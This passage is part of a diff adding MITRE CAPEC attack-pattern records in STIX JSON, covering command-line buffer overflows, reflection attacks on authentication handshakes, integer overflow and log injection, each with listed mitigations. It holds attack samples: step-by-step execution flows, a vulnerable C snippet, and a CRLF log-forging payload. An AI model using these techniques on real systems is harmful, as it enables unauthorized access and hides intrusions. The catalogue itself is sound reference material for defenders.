"Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n \n Attack Example: HPUX passwd\n A buffer overflow in the HPUX passwd command allows local users to gain root privileges via a command-line option.\n \n \n Attack Example: Solaris getopt\n A buffer overflow in Solaris's getopt command (found in libc) allows local users to gain root privileges via a long argv[0].\n \n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target system: The adversary first finds a target system that they want to gain elevated priveleges on. This could be a system they already have some level of access to or a system that they will gain unauthorized access at a lower privelege using some other means.

  2. Find injection vector: The adversary identifies command line utilities exposed by the target host that contain buffer overflow vulnerabilites. The adversary likely knows which utilities have these vulnerabilities and what the effected versions are, so they will also obtain version numbers for these utilities.

Experiment

  1. Craft overflow command: Once the adversary has found a vulnerable utility, they will use their knownledge of the vulnerabilty to create the command that will exploit the buffer overflow.

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary executes the crafted command, gaining elevated priveleges on the machine.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host exposes a command-line utility to the user.", + "The command-line utility exposed by the target host has a buffer overflow vulnerability that can be exploited." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as buffer overflow.", + "id": "course-of-action--eb3c859f-41ee-430e-8803-f17c655faf17", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-9-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--13bbe611-6800-4010-ae1b-33b6e818ee74", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eb3c859f-41ee-430e-8803-f17c655faf17", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0353216d-6356-4c9b-b2ab-5bbc23ae082a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--206efa47-ea89-4b09-8d45-dc1df1ea72bc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8ab5adf-0b4b-45fd-b053-fad9c99c3106", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bb0be5c1-63ea-4146-aec0-793d0f1c8c28", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9bfea83-be0c-47f2-99c5-56b5812d013b", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Apply the latest patches to your user exposed services. This may not be a complete solution, especially against a zero day attack.", + "id": "course-of-action--b576d060-1be3-4588-bdd8-a2b1a4f167ef", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-9-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2dd4206b-b25d-4696-8b9c-de2639f1bb97", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b576d060-1be3-4588-bdd8-a2b1a4f167ef", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not unnecessarily expose services.", + "id": "course-of-action--a89aebb1-811d-46e0-b3da-a76bf0ebceda", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-9-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--811c10ed-2d65-4f4d-87e7-31665c01f9bb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a89aebb1-811d-46e0-b3da-a76bf0ebceda", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the adversary illegitimate access to the target system, without possessing the requisite credentials. Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An adversary can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication.", + "external_references": [ + { + "external_id": "CAPEC-90", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/90.html" + }, + { + "external_id": "CWE-301", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/301.html" + }, + { + "external_id": "CWE-303", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/303.html" + } + ], + "id": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Reflection Attack in Authentication Protocol", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34", + "attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Gain Privileges", + "Bypass Protection Mechanism", + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "\n A single sign-on solution for a network uses a fixed pre-shared key with its clients to initiate the sign-on process in order to avoid eavesdropping on the initial exchanges.\n An attacker can use a reflection attack to mimic a trusted client on the network to participate in the sign-on exchange.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify service with vulnerable handshake authentication: The adversary must first identify a vulnerable authentication protocol. The most common indication of an authentication protocol vulnerable to reflection attack is when the client initiates the handshake, rather than the server. This allows the client to get the server to encrypt targeted data using the server's pre-shared key.

Experiment

  1. Send challenge to target server: The adversary opens a connection to the target server and sends it a challenge. This challenge is arbitrary and is simply used as a placeholder for the protocol in order to get the server to respond.

  2. Receive server challenge: The server responds by returning the challenge sent encrypted with the server's pre-shared key, as well as its own challenge to the attacker sent in plaintext. We will call this challenge sent by the server \"C\". C is very important and is stored off by the adversary for the next step.

  3. Initiate second handshake: Since the adversary does not possess the pre-shared key, they cannot encrypt C from the previous step in order for the server to authenticate them. To get around this, the adversary initiates a second connection to the server while still keeping the first connection alive. In the second connection, the adversary sends C as the initial client challenge, which rather than being arbitary like the first connection, is very intentional.

  4. Receive encrypted challenge: The server treats the intial client challenge in connection two as an arbitrary client challenge and responds by encrypting C with the pre-shared key. The server also sends a new challenge. The adversary ignores the server challenge and stores the encrypted version of C. The second connection is either terminated or left to expire by the adversary as it is no longer needed.

Exploit

  1. The adversary now posseses the encrypted version of C that is obtained through connection two. The adversary continues the handshake in connection one by responding to the server with the encrypted version of C, verifying that they have access to the pre-shared key (when they actually do not). Because the server uses the same pre-shared key for all authentication it will decrypt C and authenticate the adversary for the first connection, giving the adversary illegitimate access to the target system.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must have direct access to the target server in order to successfully mount a reflection attack. An intermediate entity, such as a router or proxy, that handles these exchanges on behalf of the attacker inhibits the attackers' ability to attack the authentication protocol." + ], + "x_capec_resources_required": [ + "All that the attacker requires is a means to observe and understand the protocol exchanges in order to reflect the challenges appropriately." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to have knowledge of observing the protocol exchange and managing the required connections in order to issue and respond to challenges" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The server must initiate the handshake by issuing the challenge. This ensures that the client has to respond before the exchange can move any further", + "id": "course-of-action--cf90a75d-b958-4546-b730-3f37189d661d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-90-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4612e9dd-418b-4c42-9d4f-2534fdc5e72c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf90a75d-b958-4546-b730-3f37189d661d", + "target_ref": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The use of HMAC to hash the response from the server can also be used to thwart reflection. The server responds by returning its own challenge as well as hashing the client's challenge, its own challenge and the pre-shared secret. Requiring the client to respond with the HMAC of the two challenges ensures that only the possessor of a valid pre-shared secret can successfully hash in the two values.", + "id": "course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-90-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f7753fcf-92fd-495a-8a64-8a0cb4a47728", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0", + "target_ref": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Introducing a random nonce with each new connection ensures that the attacker cannot employ two connections to attack the authentication protocol", + "id": "course-of-action--c7b237fe-4455-4bab-afe5-6c3559b98344", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-90-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6663135-b6d0-4fb2-adb1-200f7f1e01a7", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c7b237fe-4455-4bab-afe5-6c3559b98344", + "target_ref": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is contained in the existing attack pattern \"CAPEC-18 : XSS Targeting Non-Script Elements\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-91", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/91.html" + } + ], + "id": "attack-pattern--78cd63b9-a303-4e6b-8460-0270b0e2510b", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: XSS in IMG Tags", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. At worst the attacker can execute arbitrary code.", + "external_references": [ + { + "external_id": "CAPEC-92", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/92.html" + }, + { + "external_id": "CWE-190", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/190.html" + }, + { + "external_id": "CWE-128", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/128.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-122", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/122.html" + }, + { + "external_id": "CWE-196", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/196.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "Integer Overflows", + "external_id": "03", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Integer-Overflows" + }, + { + "description": "J. Viega, G. McGraw, Building Secure Software, 2002, Addison-Wesley", + "external_id": "REF-131", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Robert C. Seacord, SAMATE - Software Assurance Metrics And Tool Evaluation, 2006--05---22, National Institute of Standards and Technology (NIST)", + "external_id": "REF-547", + "source_name": "reference_from_CAPEC", + "url": "http://samate.nist.gov/SRD/view_testcase.php?tID=1511" + }, + { + "description": "Robert C. Seacord, Secure Coding in C and C++", + "external_id": "REF-548", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Forced Integer Overflow", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--1f3b920a-a706-494c-9486-69531a514912" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Integer overflow in the ProcAuWriteElement function in server/dia/audispatch.c in Network Audio System (NAS) before 1.8a SVN 237 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large max_samples value. See also: CVE-2007-1544", + "\n The following code illustrates an integer overflow. The declaration of total integer as \"unsigned short int\" assumes that the length of the first and second arguments fits in such an integer [REF-547], [REF-548].\n include include include \n int main (int argc, char *const *argv){if (argc !=3){printf(\"Usage: prog_name \\n\");exit(-1);\n }unsigned short int total;total = strlen(argv[1])+strlen(argv[2])+1;char * buff = (char *)malloc(total);strcpy(buff, argv[1]);strcpy(buff, argv[2]);\n }\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The first step is exploratory meaning the attacker looks for an integer variable that they can control.

Experiment

  1. The attacker finds an integer variable that they can write into or manipulate and try to get the value of the integer out of the possible range.

Exploit

  1. The integer variable is forced to have a value out of range which set its final value to an unexpected value.

  2. The target host acts on the data and unexpected behavior may happen.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker can manipulate the value of an integer variable utilized by the target host.", + "The target host does not do proper range checking on the variable before utilizing it.", + "When the integer variable is incremented or decremented to an out of range value, it gets a very different value (e.g. very small or negative number)" + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow by injecting malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow an integer by inserting an out of range value." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8ed81c8-ed80-43a6-b0a2-c7ead943f317", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "target_ref": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as integer overflow.", + "id": "course-of-action--15bb56ee-cdaf-431b-8136-e8cf24a3ca11", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-92-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f3d51c21-4f4c-4136-b351-f5c1b935b7cc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--15bb56ee-cdaf-431b-8136-e8cf24a3ca11", + "target_ref": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d64dd927-79c3-45ef-948b-e86799536d9d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "target_ref": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Always do bound checking before consuming user input data.", + "id": "course-of-action--875120c6-9f3e-4fed-88f3-1683f497e905", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-92-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--94ebd003-5a86-4654-a505-d70213867164", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--875120c6-9f3e-4fed-88f3-1683f497e905", + "target_ref": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing them to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.", + "external_references": [ + { + "external_id": "CAPEC-93", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-117", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-75", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "description": "J. Viega, G. McGraw, Building Secure Software, 2002, Addison-Wesley", + "external_id": "REF-131", + "source_name": "reference_from_CAPEC" + }, + { + "description": "A. Muffet, The night the log was forged", + "external_id": "REF-550", + "source_name": "reference_from_CAPEC", + "url": "http://doc.novsu.ac.ru/oreilly/tcpip/puis/ch10_05.htm" + }, + { + "description": "The OWASP Application Security Desk Reference, 2009, The Open Web Application Security Project (OWASP)", + "external_id": "REF-551", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Log_Injection" + }, + { + "description": "Fortify Software, SAMATE - Software Assurance Metrics And Tool Evaluation, 2006--06---22, National Institute of Standards and Technology (NIST)", + "external_id": "REF-552", + "source_name": "reference_from_CAPEC", + "url": "https://samate.nist.gov/SRD/view_testcase.php?tID=1579" + } + ], + "id": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Log Injection-Tampering-Forging", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--b3eaa7aa-9601-406c-ae82-0a0e2ea16116" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php. See also: CVE-2006-0201", + "\n If a user submits the string \"twenty-one\" for val, the following entry is logged:\n INFO: Failed to parse val=twenty-one\n However, if an attacker submits the string\n twenty-one%0a%0aINFO:+User+logged+out%3dbadguy\n the following entry is logged:\n INFO: Failed to parse val=twenty-oneINFO: User logged out=badguy\n Clearly, attackers can use this same mechanism to insert arbitrary log entries.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Application's Log File Format: The first step is exploratory meaning the attacker observes the system. The attacker looks for action and data that are likely to be logged. The attacker may be familiar with the log format of the system.

    2. Techniques
    Determine logging utility being used by application (e.g. log4j)
    Gain access to application's source code to determine log file formats.
    Install or obtain access to instance of application and observe its log file format.

Exploit

  1. Manipulate Log Files: The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted input that the target software will write to the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.

    2. Techniques
    \n Use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example:\n \"%0D%0A[Thu%20Nov%2012%2011:22]:Info:%20User%20admin%20logged%20in\"\n may add the following forged entry into a log file:\n \"[Thu Nov 12 12:11:22]:Info: User admin logged in\"\n Different applications may require different encodings of the carriage return and line feed characters.\n
    \n Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator's cookie and will be able to gain access as that user. For example, a log file entry could contain\n \n The script itself will be invisible to anybody viewing the logs in a web browser (unless they view the source for the page).\n
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host is logging the action and data of the user.", + "The target host insufficiently protects access to the logs or logging mechanisms." + ], + "x_capec_skills_required": { + "Low": "This attack can be as simple as adding extra characters to the logged data (e.g. username). Adding entries is typically easier than removing entries.", + "Medium": "A more sophisticated attack can try to defeat the input validation mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully control access to physical log files.", + "id": "course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--902d0a46-bb02-4c00-9c12-63139df6d6ca", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not allow tainted data to be written in the log file without prior input validation. An allowlist may be used to properly validate the data.", + "id": "course-of-action--89cb136b-4f28-4cf2-a399-ea0e5451cdd1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--87217e96-f97b-4c88-8e77-1ff3c6f211f9", + "modified": 